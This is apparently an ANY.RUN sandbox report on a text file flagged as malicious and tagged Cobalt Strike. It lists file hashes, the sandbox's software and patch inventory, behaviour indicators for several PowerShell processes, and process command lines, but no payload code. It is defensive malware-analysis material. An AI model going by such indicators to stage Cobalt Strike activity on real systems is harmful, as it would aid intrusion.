General Info

File name

ttest.text

Full analysis
https://app.any.run/tasks/52fe5ab9-da76-4142-8c08-91bda0ee5c69
Verdict
Malicious activity
Analysis date
14/01/2022, 20:35:29
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

cobaltstrike

trojan

Indicators:

MIME:
text/plain
File info:
ASCII text, with no line terminators
MD5

52cb5d2bf929392c11e48f7b7be883fb

SHA1

e250bbb9f670f05d3b1d52962c7df8e50ea06829

SHA256

16ea40f04d29f260d97e4b9d3f5ae0dcefce749119f34c1f212173907a9592d9

SSDEEP

6:snyUeCrgSqSCUdT14Ee2vCoj70/8QpQJQkhkrRksS/nmaa:snhrgSqJb25jckXYw/Fa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 11.0.9600.19596 KB4534251
  • Adobe Acrobat Reader DC (20.013.20064)
  • Adobe Flash Player 32 ActiveX (32.0.0.453)
  • Adobe Flash Player 32 NPAPI (32.0.0.453)
  • Adobe Flash Player 32 PPAPI (32.0.0.453)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.74)
  • FileZilla Client 3.51.0 (3.51.0)
  • Google Chrome (86.0.4240.198)
  • Google Update Helper (1.3.36.31)
  • Java 8 Update 271 (8.0.2710.9)
  • Java Auto Updater (2.8.271.9)
  • Microsoft .NET Framework 4.5.2 (4.5.51209)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
  • Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
  • Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
  • Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 83.0 (x86 en-US) (83.0)
  • Mozilla Maintenance Service (83.0.0.7621)
  • Notepad++ (32-bit x86) (7.9.1)
  • Opera 12.15 (12.15.1748)
  • QGA (2.14.33)
  • Skype version 8.29 (8.29)
  • VLC media player (3.0.11)
  • WinRAR 5.91 (32-bit) (5.91.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Hyphenation Parent Package English
  • IE Spelling Parent Package English
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • InternetExplorer Package TopLevel
  • KB2479943
  • KB2491683
  • KB2506212
  • KB2506928
  • KB2532531
  • KB2533552
  • KB2533623
  • KB2534111
  • KB2545698
  • KB2547666
  • KB2552343
  • KB2560656
  • KB2564958
  • KB2574819
  • KB2579686
  • KB2585542
  • KB2604115
  • KB2620704
  • KB2621440
  • KB2631813
  • KB2639308
  • KB2640148
  • KB2653956
  • KB2654428
  • KB2656356
  • KB2660075
  • KB2667402
  • KB2676562
  • KB2685811
  • KB2685813
  • KB2685939
  • KB2690533
  • KB2698365
  • KB2705219
  • KB2719857
  • KB2726535
  • KB2727528
  • KB2729094
  • KB2729452
  • KB2731771
  • KB2732059
  • KB2736422
  • KB2742599
  • KB2750841
  • KB2758857
  • KB2761217
  • KB2770660
  • KB2773072
  • KB2786081
  • KB2789645
  • KB2799926
  • KB2800095
  • KB2807986
  • KB2808679
  • KB2813347
  • KB2813430
  • KB2820331
  • KB2834140
  • KB2836942
  • KB2836943
  • KB2840631
  • KB2843630
  • KB2847927
  • KB2852386
  • KB2853952
  • KB2857650
  • KB2861698
  • KB2862152
  • KB2862330
  • KB2862335
  • KB2864202
  • KB2868038
  • KB2871997
  • KB2872035
  • KB2884256
  • KB2891804
  • KB2893294
  • KB2893519
  • KB2894844
  • KB2900986
  • KB2908783
  • KB2911501
  • KB2912390
  • KB2918077
  • KB2919469
  • KB2923545
  • KB2931356
  • KB2937610
  • KB2943357
  • KB2952664
  • KB2968294
  • KB2970228
  • KB2972100
  • KB2972211
  • KB2973112
  • KB2973201
  • KB2977292
  • KB2978120
  • KB2978742
  • KB2984972
  • KB2984976
  • KB2984976 SP1
  • KB2985461
  • KB2991963
  • KB2992611
  • KB2999226
  • KB3004375
  • KB3006121
  • KB3006137
  • KB3010788
  • KB3011780
  • KB3013531
  • KB3019978
  • KB3020370
  • KB3020388
  • KB3021674
  • KB3021917
  • KB3022777
  • KB3023215
  • KB3030377
  • KB3031432
  • KB3035126
  • KB3037574
  • KB3042058
  • KB3045685
  • KB3046017
  • KB3046269
  • KB3054476
  • KB3055642
  • KB3059317
  • KB3060716
  • KB3061518
  • KB3067903
  • KB3068708
  • KB3071756
  • KB3072305
  • KB3074543
  • KB3075226
  • KB3078667
  • KB3080149
  • KB3086255
  • KB3092601
  • KB3093513
  • KB3097989
  • KB3101722
  • KB3102429
  • KB3102810
  • KB3107998
  • KB3108371
  • KB3108664
  • KB3109103
  • KB3109560
  • KB3110329
  • KB3115858
  • KB3118401
  • KB3122648
  • KB3123479
  • KB3126587
  • KB3127220
  • KB3133977
  • KB3137061
  • KB3138378
  • KB3138612
  • KB3138910
  • KB3139398
  • KB3139914
  • KB3140245
  • KB3147071
  • KB3150220
  • KB3150513
  • KB3155178
  • KB3156016
  • KB3159398
  • KB3161102
  • KB3161949
  • KB3170735
  • KB3172605
  • KB3179573
  • KB3184143
  • KB3185319
  • KB4019990
  • KB4040980
  • KB4474419
  • KB4490628
  • KB4524752
  • KB4532945
  • KB4536952
  • KB4567409
  • KB958488
  • KB976902
  • KB982018
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • Package 21 for KB2984976
  • Package 38 for KB2984976
  • Package 45 for KB2984976
  • Package 59 for KB2984976
  • Package 7 for KB2984976
  • Package 76 for KB2984976
  • PlatformUpdate Win7 SRV08R2 Package TopLevel
  • ProfessionalEdition
  • RDP BlueIP Package TopLevel
  • RDP WinIP Package TopLevel
  • RollupFix
  • UltimateEdition
  • WUClient SelfUpdate ActiveX
  • WUClient SelfUpdate Aux TopLevel
  • WUClient SelfUpdate Core TopLevel
  • WinMan WinIP Package TopLevel

Behavior activities

MALICIOUS SUSPICIOUS INFO
COBALTSTRIKE was detected
  • powershell.exe (PID: 2640)
  • powershell.exe (PID: 188)
  • powershell.exe (PID: 2560)
Reads the computer name
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 2640)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 188)
  • powershell.exe (PID: 2876)
  • powershell.exe (PID: 2560)
  • powershell.exe (PID: 1108)
  • powershell.exe (PID: 3396)
Checks supported languages
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 2640)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 188)
  • powershell.exe (PID: 2876)
  • powershell.exe (PID: 2560)
  • powershell.exe (PID: 1108)
  • powershell.exe (PID: 3396)
PowerShell script executed
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 2876)
  • powershell.exe (PID: 1108)
  • powershell.exe (PID: 3396)
Creates files in the user directory
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 2876)
  • powershell.exe (PID: 1108)
  • powershell.exe (PID: 3396)
Reads Environment values
  • powershell.exe (PID: 2640)
  • powershell.exe (PID: 188)
  • powershell.exe (PID: 2560)
Reads the date of Windows installation
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 2876)
  • powershell.exe (PID: 1108)
  • powershell.exe (PID: 3396)
Executes PowerShell scripts
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 2876)
Application launched itself
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 2876)
  • taskmgr.exe (PID: 1292)
Checks supported languages
  • rundll32.exe (PID: 3088)
  • taskmgr.exe (PID: 1292)
  • taskmgr.exe (PID: 3360)
  • WINWORD.EXE (PID: 1764)
  • WINWORD.EXE (PID: 1364)
  • WINWORD.EXE (PID: 2464)
  • WINWORD.EXE (PID: 1856)
  • WINWORD.EXE (PID: 2784)
  • WINWORD.EXE (PID: 1340)
Manual execution by user
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 2876)
  • taskmgr.exe (PID: 1292)
  • powershell.exe (PID: 1108)
  • WINWORD.EXE (PID: 1764)
  • WINWORD.EXE (PID: 1364)
  • WINWORD.EXE (PID: 2464)
  • WINWORD.EXE (PID: 2784)
  • WINWORD.EXE (PID: 1856)
  • WINWORD.EXE (PID: 1340)
  • powershell.exe (PID: 3396)
Checks Windows Trust Settings
  • powershell.exe (PID: 2640)
  • powershell.exe (PID: 2252)
  • powershell.exe (PID: 3112)
  • powershell.exe (PID: 188)
  • powershell.exe (PID: 2876)
  • powershell.exe (PID: 2560)
  • powershell.exe (PID: 1108)
  • powershell.exe (PID: 3396)
Reads the computer name
  • taskmgr.exe (PID: 1292)
  • taskmgr.exe (PID: 3360)
  • WINWORD.EXE (PID: 1764)
  • WINWORD.EXE (PID: 1364)
  • WINWORD.EXE (PID: 2464)
  • WINWORD.EXE (PID: 1856)
  • WINWORD.EXE (PID: 2784)
  • WINWORD.EXE (PID: 1340)
Reads Microsoft Office registry keys
  • powershell.exe (PID: 1108)
  • WINWORD.EXE (PID: 1764)
  • WINWORD.EXE (PID: 1364)
  • WINWORD.EXE (PID: 1856)
  • WINWORD.EXE (PID: 2784)
  • WINWORD.EXE (PID: 2464)
  • powershell.exe (PID: 3396)
  • WINWORD.EXE (PID: 1340)
Creates files in the user directory
  • WINWORD.EXE (PID: 1764)
  • WINWORD.EXE (PID: 2464)
  • WINWORD.EXE (PID: 1364)
  • WINWORD.EXE (PID: 1856)
  • WINWORD.EXE (PID: 2784)
  • WINWORD.EXE (PID: 1340)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

Screenshots

Processes

Total processes
74
Monitored processes
17
Malicious processes
8
Suspicious processes
0

Behavior graph

+
start rundll32.exe no specs powershell.exe no specs #COBALTSTRIKE powershell.exe powershell.exe no specs #COBALTSTRIKE powershell.exe powershell.exe no specs #COBALTSTRIKE powershell.exe taskmgr.exe no specs taskmgr.exe powershell.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs winword.exe no specs powershell.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3088
CMD
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\shell32.dll,OpenAs_RunDLL "C:\Users\admin\Desktop\ttest.text"
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\user32.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\userenv.dll
c:\windows\system32\rundll32.exe
c:\windows\system32\rpcrt4.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\lpk.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\propsys.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\msctf.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\gdi32.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll

PID
2252
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-file" "C:\Users\admin\Desktop\ttest.ps1"
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Image
c:\windows\system32\sechost.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\profapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\cryptsp.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\atl.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\shell32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\mscorlib\d1265d6159ea876f9d63ea4c1361b587\mscorlib.ni.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\imm32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\cscapi.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msctf.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\lpk.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\microsoft.net\framework\v4.0.30319\clr.dll
c:\windows\system32\normaliz.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.pb378ec07#\f1d8ac3fc151a1b35ead27559bc8a3f2\microsoft.powershell.consolehost.ni.dll
c:\windows\microsoft.net\assembly\gac_msil\system.management.automation\v4.0_3.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\system32\psapi.dll
c:\windows\microsoft.net\assembly\gac_32\system.data\v4.0_4.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.core\e0fea191b75897ec38735bfc31b89fe0\system.core.ni.dll
c:\windows\system32\wintrust.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.management\945435ba615b8bd1ff688ebfa43fae39\system.management.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.xml\668bc5e53fd656dc16c9f40ea15e872e\system.xml.ni.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v4.0.30319\nlssorting.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system\b75ba99f72f116d8951b0f2bba8c276a\system.ni.dll
c:\windows\system32\crypt32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.manaa57fc8cc#\f708839fba911a86a06614a9e93dff91\system.management.automation.ni.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\api-ms-win-downlevel-ole32-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l1-1-0.dll
c:\windows\system32\wininet.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.dired13b18a9#\0d2b4443c599d5abb019993d813d4e89\system.directoryservices.ni.dll
c:\windows\microsoft.net\assembly\gac_32\system.transactions\v4.0_4.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\system32\api-ms-win-downlevel-user32-l1-1-0.dll
c:\windows\system32\secur32.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.csharp\1648a6a48cb8705ca13d482d0e9a5a4f\microsoft.csharp.ni.dll
c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
c:\windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\system.data\add15017f88a7eccb8676d7239297d1c\system.data.ni.dll
c:\windows\assembly\nativeimages_v4.0.30319_32\microsoft.p6f792626#\d4c6baaee5b33b9a03a9afd841050c89\microsoft.powershell.security.ni.dll
